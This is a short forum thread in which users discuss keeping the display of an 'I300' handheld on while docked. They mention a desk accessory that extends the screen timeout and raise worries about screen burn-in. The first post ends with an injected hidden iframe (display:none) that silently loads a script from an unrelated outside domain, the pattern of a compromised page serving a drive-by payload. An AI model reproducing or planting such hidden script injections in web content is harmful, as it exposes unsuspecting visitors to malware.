Question Leaving Display On while in Cradle

Is there a way to keep the Display active while the I300 sits in the cradle? This feature is desirable for my office environment where I've installed my 2nd cradle. I know I was able to do this with my Palm Vx.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It seems nuts but I've looked and I think the answer is no. It only gives you 4 options for auto-off ... 30 sec, 1, 2 and 3 min. It's crazy not to have an "off" option. Maybe they figured it would cause battery drain when the phone cuts on accidentally in your pocket -- but can't I make that decision? There very well may be a Hack that can solve this, however.

    AOCtrlDA - Always on display

Desk Accessory called AOCtrl DA http://www.palmgear.com/software/sho...6&prodID=12095 will allow you to adjust the screen timeout. Shut off display after: never, 10 sec, 30 sec...5 min, 10 min, and 30 min.

It is not related to being in the cradle or out of cradle...but it is better than default choices.

    Arrow

perhaps they left this option out because they were concerned about the life of the backlight and screen....

    just my .00002 cents...

I think you are right -- the screen seems vulnerable to image burn. Anyone else notice this?

    Be careful....
